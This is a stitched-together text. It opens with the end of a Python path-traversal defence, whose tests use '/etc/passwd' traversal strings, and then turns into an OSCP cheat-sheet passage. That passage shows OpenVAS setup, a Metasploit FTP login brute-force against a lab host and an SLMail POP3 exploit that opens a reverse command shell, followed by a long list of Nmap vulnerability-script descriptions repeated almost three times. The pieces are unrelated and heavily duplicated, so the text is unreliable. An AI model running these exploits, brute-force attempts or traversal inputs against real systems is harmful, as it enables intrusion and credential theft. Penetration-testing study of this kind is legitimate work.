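    data = raw.encode("utf-8")
    # Percent-decode repeatedly so double encoding (%252e -> %2e -> .) is undone too.
    for _ in range(3):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    # Fold overlong sequences to the ASCII byte they stand for.
    data = _OVERLONG_2BYTE.sub(
        lambda m: bytes([((m.group(0)[0] & 0x1F) << 6) | (m.group(1)[0] & 0x3F)]),
        data)
    text = data.decode("utf-8", "replace")
    return text.replace("\\", "/")          # Windows separators count as separators


def resolve_under_root(root: str, raw: str):
    """Return the absolute path to serve, or None if the request must be refused."""
    path = canonicalize(raw)
    if "\x00" in path:                      # NUL truncation trick: refuse outright
        return None
    # A leading slash is taken as relative to the document root. Stripping it also
    # avoids the classic join pitfall where an absolute argument discards root.
    rel = posixpath.normpath(path.lstrip("/"))
    if rel == ".." or rel.startswith("../"):
        return None                         # still climbs above root after normalising
    full = posixpath.normpath(posixpath.join(root, rel))
    # Belt and braces: the final path must lie inside root.
    if posixpath.commonpath([root, full]) != root:
        return None
    return full


if __name__ == "__main__":
    for req in ["images/logo.png", "../../../../etc/passwd",
                "/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"]:
        print(f"{req!r:45} -> {resolve_under_root(ROOT, req)}")
```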

Cheat Sheet How to pass the OSCP Offensive Security Certified Professional Exam Step-by-Step Guide- Vulnerability Scanning – PART 4

 

 


The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.

The actual security scanner is accompanied with a daily updated feed of Network Vulnerability Tests (NVTs), over 33,000 in total (as of December 2013).

All OpenVAS products are Free Software. Most components are licensed under the GNU General Public License (GNU GPL).

 

root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade

root@kali:~# apt-get install openvas
root@kali:~# openvas-setup
/var/lib/openvas/private/CA created
/var/lib/openvas/CA created

[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed'.
[i] Online information about this feed: 'http://www.openvas.org/openvas-nvt-feed'

sent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec
total size is 681654050 speedup is 1.00
[i] Initializing scap database
[i] Updating CPEs
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml

Write out database with 1 new entries
Data Base Updated
Restarting Greenbone Security Assistant: gsad.
User created with password '6062d074-0a4c-4de1-a26a-5f9f055b7c88'.

root@kali:~# openvas-start
Starting OpenVas Services
Starting Greenbone Security Assistant: gsad.
Starting OpenVAS Scanner: openvassd.
Starting OpenVAS Manager: openvasmd.

openvas vulnerability scanner

 

 


 

 

root@kali:~# systemctl start postgresql
To have this service start at boot time, enable it using systemctl as follows:
root@kali:~# systemctl enable postgresql

 

root@kali:~# msfconsole
=[ metasploit v4.5.3-2013040301 [core:4.5 api:1.0]
+ -- --=[ 1084 exploits - 675 auxiliary - 181 post
+ -- --=[ 277 payloads - 29 encoders - 8 nops
msf > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, options

msf > show auxiliary

msf> use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > info
Name: SNMP Enumeration Module
Module: auxiliary/scanner/snmp/snmp_enum

msf auxiliary(snmp_enum) > show options
Module options (auxiliary/scanner/snmp/snmp_enum):

msf auxiliary(snmp_enum) >

root@kali:~# msfconsole -q
msf> search type:auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set PASS_FILE /root/password-file.txt
msf auxiliary(ftp_login) > set USERPASS_FILE /root/users.txt
msf auxiliary(ftp_login) > set RHOSTS 192.168.11.219
msf auxiliary(ftp_login) > run
[*] Connecting to FTP server 192.168.11.219:21...
[*] Connected to target FTP server.
[*] 192.168.11.219:21 FTP - [003/341] - Failed FTP login for 'mike':''
[*] 192.168.11.219:21 FTP - [004/341] - Attempting FTP login for 'ubuntu':''
[*] 192.168.11.219:21 FTP - [004/341] - Failed FTP login for 'ubuntu':''
[*] 192.168.11.219:21 FTP - [005/341] - Attempting FTP login for 'root':'root'
[*] 192.168.11.219:21 FTP - [005/341] - Failed FTP login for 'root':'root'
[*] 192.168.11.219:21 FTP - [006/341] - Attempting FTP login for 'bob':'bob'

[-] 192.168.11.219:21 FTP - [006/341] - Caught EOFError, reconnecting
[*] Connecting to FTP server 192.168.11.219:21...
[*] Connected to target FTP server.
[*] 192.168.11.219:21 FTP - [006/341] - Failed FTP login for 'bob':'bob'
[*] 192.168.11.219:21 FTP - [007/341] - Attempting FTP login for 'mike':'mike'
[*] 192.168.11.219:21 FTP - [007/341] - Failed FTP login for 'mike':'mike'
[*] 192.168.11.219:21 FTP - [008/341] - Attempting login for 'ubuntu':'ubuntu'
[+] 192.168.11.219:21 - Successful FTP login for 'ubuntu':'ubuntu'
[*] 192.168.11.219:21 - User 'ubuntu' has READ/WRITE access

 

root@kali:~# msfconsole
=[ metasploit v4.5.3-2013040301 [core:4.5 api:1.0]
+ -- --=[ 1084 exploits - 675 auxiliary - 181 post
+ -- --=[ 277 payloads - 29 encoders - 8 nops
msf > search pop3
msf > use exploit/windows/pop3/seattlelab_pass
msf exploit(seattlelab_pass) > show options
msf exploit(seattlelab_pass) > info
Module options (exploit/windows/pop3/seattlelab_pass):

   Current Setting  Required  Description
   ---------------  --------  -----------
                    yes       The target address
                    yes       The target port

 

msf exploit(seattlelab_pass) > exploit
[*] Started reverse handler on 192.168.10.5:4444
[*] Trying Windows NT/2000/XP/2003 (SLMail 5.5) using jmp esp at 5f4a358f
[*] Command shell session 1 opened (192.168.10.5:4444 -> 192.168.11.35:49161)
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.
All rights reserved.
C:\Program Files\SLmail\System>

 

 

 


 

 

Scripts
afp-path-vuln

Detects the Mac OS X AFP directory traversal vulnerability, CVE-2010-0533.
broadcast-avahi-dos

Attempts to discover hosts in the local network using the DNS Service Discovery protocol and sends a NULL UDP packet to each host to test if it is vulnerable to the Avahi NULL UDP packet denial of service (CVE-2011-1002).
clamav-exec

Exploits ClamAV servers vulnerable to unauthenticated clamav command execution.
distcc-cve2004-2687

Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementations due to poor configuration of the service.
dns-update

Attempts to perform a dynamic DNS update without authentication.
firewall-bypass

Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.
ftp-libopie

Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow), a vulnerability discovered by Maksymilian Arciemowicz and Adam “pi3” Zabrocki. See the advisory at https://nmap.org/r/fbsd-sa-opie. Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
ftp-proftpd-backdoor

Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the ftp-proftpd-backdoor.cmd script argument.
ftp-vsftpd-backdoor

Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.
ftp-vuln-cve2010-4221

Checks for a stack-based buffer overflow in the ProFTPD server, version between 1.3.2rc3 and 1.3.3b. By sending a large number of TELNET_IAC escape sequence, the proftpd process miscalculates the buffer length, and a remote attacker will be able to corrupt the stack and execute arbitrary code within the context of the proftpd process (CVE-2010-4221). Authentication is not required to exploit this vulnerability.
http-adobe-coldfusion-apsa1301

Attempts to exploit an authentication bypass vulnerability in Adobe Coldfusion servers to retrieve a valid administrator’s session cookie.
http-aspnet-debug

Determines if a ASP.NET application has debugging enabled using a HTTP DEBUG request.
http-avaya-ipoffice-users

Attempts to enumerate users in Avaya IP Office systems 7.x.
http-awstatstotals-exec

Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE-2008-3922).
http-axis2-dir-traversal

Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service '/conf/axis2.xml' using the path '/axis2/services/' to return the username and password of the admin account.
http-cookie-flags

Examines cookies set by HTTP services. Reports any session cookies set without the httponly flag. Reports any session cookies set over SSL without the secure flag. If http-enum.nse is also run, any interesting paths found by it will be checked in addition to the root.
http-cross-domain-policy

Checks the cross-domain policy file (/crossdomain.xml) and the client-access-policy file (/clientaccesspolicy.xml) in web applications and lists the trusted domains. Overly permissive settings enable Cross Site Request Forgery attacks and may allow attackers to access sensitive data. This script is useful to detect permissive configurations and possible domain names available for purchase to exploit the application.
http-csrf

This script detects Cross Site Request Forgeries (CSRF) vulnerabilities.
http-dlink-backdoor

Detects a firmware backdoor on some D-Link routers by changing the User-Agent to a “secret” value. Using the “secret” User-Agent bypasses authentication and allows admin access to the router.
http-dombased-xss

It looks for places where attacker-controlled information in the DOM may be used to affect JavaScript execution in certain ways. The attack is explained here: http://www.webappsec.org/projects/articles/071105.shtml
http-enum

Enumerates directories used by popular web applications and servers.
http-fileupload-exploiter

Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.
http-frontpage-login

Checks whether target machines are vulnerable to anonymous Frontpage login.
http-git

Checks for a Git repository found in a website's document root (/.git/<something>) and retrieves as much repo information as possible, including language/framework, remotes, last commit message, and repository description.
http-huawei-hg5xx-vuln

Detects Huawei modems models HG530x, HG520x, HG510x (and possibly others…) vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials and other interesting configuration values.
http-iis-webdav-vuln

Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020, https://nmap.org/r/ms09-020.
http-internal-ip-disclosure

Determines if the web server leaks its internal IP address when sending an HTTP/1.0 request without a Host header.
http-litespeed-sourcecode-download

Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script’s source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
http-majordomo2-dir-traversal

Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).
http-method-tamper

Attempts to bypass password protected resources (HTTP 401 status) by performing HTTP verb tampering. If an array of paths to check is not set, it will crawl the web server and perform the check against any password protected resource that it finds.
http-passwd

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.
http-phpmyadmin-dir-traversal

Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.
http-phpself-xss

Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $_SERVER["PHP_SELF"].
http-shellshock

Attempts to exploit the “shellshock” vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.
http-slowloris-check

Tests a web server for vulnerability to the Slowloris DoS attack without actually launching a DoS attack.
http-sql-injection

Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.
http-stored-xss

An unfiltered '>' (greater-than sign) in a response is an indication of a potential XSS vulnerability.
http-tplink-dir-traversal

Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
http-trace

Sends an HTTP TRACE request and shows if the method TRACE is enabled. If debug is enabled, it returns the header fields that were modified in the response.
http-vmware-path-vuln

Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).
http-vuln-cve2006-3392

Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392)
http-vuln-cve2010-0738

Tests whether a JBoss target is vulnerable to jmx console authentication bypass (CVE-2010-0738).
http-vuln-cve2010-2861

Executes a directory traversal attack against a ColdFusion server and tries to grab the password hash for the administrator user. It then uses the salt value (hidden in the web page) to create the SHA1 HMAC hash that the web server needs for authentication as admin. You can pass this value to the ColdFusion server as the admin without cracking the password hash.
http-vuln-cve2011-3192

Detects a denial of service vulnerability in the way the Apache web server handles requests for multiple overlapping/simple ranges of a page.
http-vuln-cve2011-3368

Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server’s reverse proxy mode. The script will run 3 tests:

the loopback test, with 3 payloads to handle different rewrite rules
the internal hosts test. According to Contextis, we expect a delay before a server error.
The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.

http-vuln-cve2012-1823

Detects PHP-CGI installations that are vulnerable to CVE-2012-1823. This critical vulnerability allows attackers to retrieve source code and execute code remotely.
http-vuln-cve2013-0156

Detects Ruby on Rails servers vulnerable to object injection, remote command executions and denial of service attacks. (CVE-2013-0156)
http-vuln-cve2013-6786

Detects a URL redirection and reflected XSS vulnerability in Allegro RomPager Web server. The vulnerability has been assigned CVE-2013-6786.
http-vuln-cve2013-7091

A 0-day was released on 6 December 2013 by rubina119 and was patched in Zimbra 7.2.6.
http-vuln-cve2014-2126

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM Privilege Escalation Vulnerability (CVE-2014-2126).
http-vuln-cve2014-2127

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Privilege Escalation Vulnerability (CVE-2014-2127).
http-vuln-cve2014-2128

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Authentication Bypass Vulnerability (CVE-2014-2128).
http-vuln-cve2014-2129

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP Denial of Service Vulnerability (CVE-2014-2129).
http-vuln-cve2014-3704

Exploits CVE-2014-3704, also known as 'Drupageddon', in Drupal. Versions < 7.32 of Drupal core are known to be affected.
http-vuln-cve2014-8877

Exploits a remote code injection vulnerability (CVE-2014-8877) in WordPress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.
http-vuln-cve2015-1427

This script attempts to detect a vulnerability, CVE-2015-1427, which allows attackers to leverage features of this API to gain unauthenticated remote code execution (RCE).
http-vuln-cve2015-1635

Checks for a remote code execution vulnerability (MS15-034) in Microsoft Windows systems (CVE-2015-1635).
http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).
http-vuln-misfortune-cookie

Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.
http-vuln-wnr1000-creds

A vulnerability has been discovered in the WNR 1000 series that allows an attacker to retrieve administrator credentials through the router interface. Tested on firmware version(s): V1.0.2.60_60.0.86 (latest) and V1.0.2.54_60.0.82NA.
http-wordpress-users

Enumerates usernames in WordPress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
ipmi-cipher-zero

IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0 compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.
irc-botnet-channels

Checks an IRC server for channels that are commonly used by malicious botnets.
irc-unrealircd-backdoor

Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.
mysql-vuln-cve2012-2122

netbus-auth-bypass

Checks if a NetBus server is vulnerable to an authentication bypass vulnerability which allows full access without knowing the password.
qconn-exec

Attempts to identify whether a listening QNX QCONN daemon allows unauthenticated users to execute arbitrary operating system commands.
rdp-vuln-ms12-020

Checks if a machine is vulnerable to MS12-020 RDP vulnerability.
realvnc-auth-bypass

Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
rmi-vuln-classloader

Tests whether Java rmiregistry allows class loading. The default configuration of rmiregistry allows loading classes from remote URLs, which can lead to remote code execution. The vendor (Oracle/Sun) classifies this as a design feature.
samba-vuln-cve-2012-1182

Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.
smb-vuln-conficker

Detects Microsoft Windows systems infected by the Conficker worm. This check is dangerous and it may crash systems.
smb-vuln-cve2009-3103

Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.
smb-vuln-ms06-025

Detects Microsoft Windows systems with Ras RPC service vulnerable to MS06-025.
smb-vuln-ms07-029

Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
smb-vuln-ms08-067

Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.
smb-vuln-ms10-054

Tests whether target machines are vulnerable to the ms10-054 SMB remote memory corruption vulnerability.
smb-vuln-ms10-061

Tests whether target machines are vulnerable to ms10-061 Printer Spooler impersonation vulnerability.
smb-vuln-regsvc-dos

Checks if a Microsoft Windows 2000 system is vulnerable to a crash in regsvc caused by a null pointer dereference. This check will crash the service if it is vulnerable and requires a guest account or higher to work.
smtp-vuln-cve2010-4344

Checks for and/or exploits a heap overflow within versions of Exim prior to version 4.69 (CVE-2010-4344) and a privilege escalation vulnerability in Exim 4.72 and prior (CVE-2010-4345).
smtp-vuln-cve2011-1720

Checks for a memory corruption in the Postfix SMTP server when it uses Cyrus SASL library authentication mechanisms (CVE-2011-1720). This vulnerability can allow denial of service and possibly remote code execution.
smtp-vuln-cve2011-1764

Checks for a format string vulnerability in the Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support (CVE-2011-1764). The DKIM logging mechanism did not use format string specifiers when logging some parts of the DKIM-Signature header field. A remote attacker who is able to send emails, can exploit this vulnerability and execute arbitrary code with the privileges of the Exim daemon.
ssl-ccs-injection

Detects whether a server is vulnerable to the SSL/TLS “CCS Injection” vulnerability (CVE-2014-0224), first discovered by Masashi Kikuchi. The script is based on the ccsinjection.c code authored by Ramon de C Valle (https://gist.github.com/rcvalle/71f4b027d61a78c42607)
ssl-cert-intaddr

Reports any private (RFC1918) IPv4 addresses found in the various fields of an SSL service’s certificate. These will only be reported if the target address itself is not private. Nmap v7.30 or later is required.
ssl-dh-params

Weak ephemeral Diffie-Hellman parameter detection for SSL/TLS services.
ssl-heartbleed

Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)
ssl-known-key

Checks whether the SSL certificate used by a host has a fingerprint that matches an included database of problematic keys.
ssl-poodle

Checks whether SSLv3 CBC ciphers are allowed (POODLE).
sslv2-drown

Determines whether the server supports SSLv2, what ciphers it supports, and tests for CVE-2015-3197, CVE-2016-0703 and CVE-2016-0800 (DROWN).
supermicro-ipmi-conf

Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
tls-ticketbleed

Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).
wdb-version

Detects vulnerabilities and gathers information (such as version numbers and hardware support) from VxWorks Wind DeBug agents.
This script attempts to detect a vulnerability, CVE-2015-1427, which allows attackers to leverage features of this API to gain unauthenticated remote code execution (RCE).
http-vuln-cve2015-1635

Checks for a remote code execution vulnerability (MS15-034) in Microsoft Windows systems (CVE2015-2015-1635).
http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).
http-vuln-misfortune-cookie

Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.
http-vuln-wnr1000-creds

A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
http-wordpress-users

Enumerates usernames in WordPress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
ipmi-cipher-zero

IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0 compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.
irc-botnet-channels

Checks an IRC server for channels that are commonly used by malicious botnets.
irc-unrealircd-backdoor

Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.
mysql-vuln-cve2012-2122

netbus-auth-bypass

Checks if a NetBus server is vulnerable to an authentication bypass vulnerability which allows full access without knowing the password.
qconn-exec

Scripts
afp-path-vuln

Detects the Mac OS X AFP directory traversal vulnerability, CVE-2010-0533.
broadcast-avahi-dos

Attempts to discover hosts in the local network using the DNS Service Discovery protocol and sends a NULL UDP packet to each host to test if it is vulnerable to the Avahi NULL UDP packet denial of service (CVE-2011-1002).
clamav-exec

Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.
distcc-cve2004-2687

Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.
dns-update

Attempts to perform a dynamic DNS update without authentication.
firewall-bypass

Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.
ftp-libopie

Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow), a vulnerability discovered by Maksymilian Arciemowicz and Adam “pi3” Zabrocki. See the advisory at https://nmap.org/r/fbsd-sa-opie. Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
ftp-proftpd-backdoor

Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the ftp-proftpd-backdoor.cmd script argument.
ftp-vsftpd-backdoor

Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.
ftp-vuln-cve2010-4221

Checks for a stack-based buffer overflow in the ProFTPD server, version between 1.3.2rc3 and 1.3.3b. By sending a large number of TELNET_IAC escape sequence, the proftpd process miscalculates the buffer length, and a remote attacker will be able to corrupt the stack and execute arbitrary code within the context of the proftpd process (CVE-2010-4221). Authentication is not required to exploit this vulnerability.
http-adobe-coldfusion-apsa1301

Attempts to exploit an authentication bypass vulnerability in Adobe Coldfusion servers to retrieve a valid administrator’s session cookie.
http-aspnet-debug

Determines if a ASP.NET application has debugging enabled using a HTTP DEBUG request.
http-avaya-ipoffice-users

Attempts to enumerate users in Avaya IP Office systems 7.x.
http-awstatstotals-exec

Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).
http-axis2-dir-traversal

Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service ‘/conf/axis2.xml’ using the path ‘/axis2/services/’ to return the username and password of the admin account.
http-cookie-flags

Examines cookies set by HTTP services. Reports any session cookies set without the httponly flag. Reports any session cookies set over SSL without the secure flag. If http-enum.nse is also run, any interesting paths found by it will be checked in addition to the root.
http-cross-domain-policy

Checks the cross-domain policy file (/crossdomain.xml) and the client-acces-policy file (/clientaccesspolicy.xml) in web applications and lists the trusted domains. Overly permissive settings enable Cross Site Request Forgery attacks and may allow attackers to access sensitive data. This script is useful to detect permissive configurations and possible domain names available for purchase to exploit the application.
http-csrf

This script detects Cross Site Request Forgeries (CSRF) vulnerabilities.
http-dlink-backdoor

Detects a firmware backdoor on some D-Link routers by changing the User-Agent to a “secret” value. Using the “secret” User-Agent bypasses authentication and allows admin access to the router.
http-dombased-xss

It looks for places where attacker-controlled information in the DOM may be used to affect JavaScript execution in certain ways. The attack is explained here: http://www.webappsec.org/projects/articles/071105.shtml
http-enum

Enumerates directories used by popular web applications and servers.
http-fileupload-exploiter

Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.
http-frontpage-login

Checks whether target machines are vulnerable to anonymous Frontpage login.
http-git

Checks for a Git repository found in a website's document root (/.git/<something>) and retrieves as much repo information as possible, including language/framework, remotes, last commit message, and repository description.
http-huawei-hg5xx-vuln

Detects Huawei modems models HG530x, HG520x, HG510x (and possibly others…) vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials and other interesting configuration values.
http-iis-webdav-vuln

Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020, https://nmap.org/r/ms09-020.
http-internal-ip-disclosure

Determines if the web server leaks its internal IP address when sending an HTTP/1.0 request without a Host header.
http-litespeed-sourcecode-download

Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script’s source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
http-majordomo2-dir-traversal

Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).
http-method-tamper

Attempts to bypass password protected resources (HTTP 401 status) by performing HTTP verb tampering. If an array of paths to check is not set, it will crawl the web server and perform the check against any password protected resource that it finds.
http-passwd

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.
http-phpmyadmin-dir-traversal

Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.
http-phpself-xss

Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $_SERVER[“PHP_SELF”].
http-shellshock

Attempts to exploit the “shellshock” vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.
http-slowloris-check

Tests a web server for vulnerability to the Slowloris DoS attack without actually launching a DoS attack.
http-sql-injection

Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.
http-stored-xss

Unfiltered ‘>’ (greater than sign). An indication of potential XSS vulnerability.
http-tplink-dir-traversal

Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
http-trace

Sends an HTTP TRACE request and shows if the method TRACE is enabled. If debug is enabled, it returns the header fields that were modified in the response.
http-vmware-path-vuln

Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).
http-vuln-cve2006-3392

Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392)
http-vuln-cve2010-0738

Tests whether a JBoss target is vulnerable to jmx console authentication bypass (CVE-2010-0738).
http-vuln-cve2010-2861

Executes a directory traversal attack against a ColdFusion server and tries to grab the password hash for the administrator user. It then uses the salt value (hidden in the web page) to create the SHA1 HMAC hash that the web server needs for authentication as admin. You can pass this value to the ColdFusion server as the admin without cracking the password hash.
http-vuln-cve2011-3192

Detects a denial of service vulnerability in the way the Apache web server handles requests for multiple overlapping/simple ranges of a page.
http-vuln-cve2011-3368

Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server’s reverse proxy mode. The script will run 3 tests:

the loopback test, with 3 payloads to handle different rewrite rules
the internal hosts test. According to Contextis, we expect a delay before a server error.
The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.

http-vuln-cve2012-1823

Detects PHP-CGI installations that are vulnerable to CVE-2012-1823. This critical vulnerability allows attackers to retrieve source code and execute code remotely.
http-vuln-cve2013-0156

Detects Ruby on Rails servers vulnerable to object injection, remote command executions and denial of service attacks. (CVE-2013-0156)
http-vuln-cve2013-6786

Detects a URL redirection and reflected XSS vulnerability in Allegro RomPager Web server. The vulnerability has been assigned CVE-2013-6786.
http-vuln-cve2013-7091

A zero-day was released on 6 December 2013 by rubina119 and was patched in Zimbra 7.2.6.
http-vuln-cve2014-2126

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM Privilege Escalation Vulnerability (CVE-2014-2126).
http-vuln-cve2014-2127

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Privilege Escalation Vulnerability (CVE-2014-2127).
http-vuln-cve2014-2128

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Authentication Bypass Vulnerability (CVE-2014-2128).
http-vuln-cve2014-2129

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP Denial of Service Vulnerability (CVE-2014-2129).
http-vuln-cve2014-3704

Exploits CVE-2014-3704, also known as 'Drupageddon', in Drupal. Versions < 7.32 of Drupal core are known to be affected.
http-vuln-cve2014-8877

Exploits a remote code injection vulnerability (CVE-2014-8877) in WordPress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.
http-vuln-cve2015-1427

This script attempts to detect a vulnerability, CVE-2015-1427, which allows attackers to leverage features of this API to gain unauthenticated remote code execution (RCE).
http-vuln-cve2015-1635

Checks for a remote code execution vulnerability (MS15-034) in Microsoft Windows systems (CVE-2015-1635).
http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).
http-vuln-misfortune-cookie

Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.
http-vuln-wnr1000-creds

A vulnerability has been discovered in the Netgear WNR1000 series that allows an attacker to retrieve administrator credentials through the router's web interface. Tested on firmware versions V1.0.2.60_60.0.86 (latest) and V1.0.2.54_60.0.82NA.
http-wordpress-users

Enumerates usernames in WordPress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
ipmi-cipher-zero

IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0 compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.
irc-botnet-channels

Checks an IRC server for channels that are commonly used by malicious botnets.
irc-unrealircd-backdoor

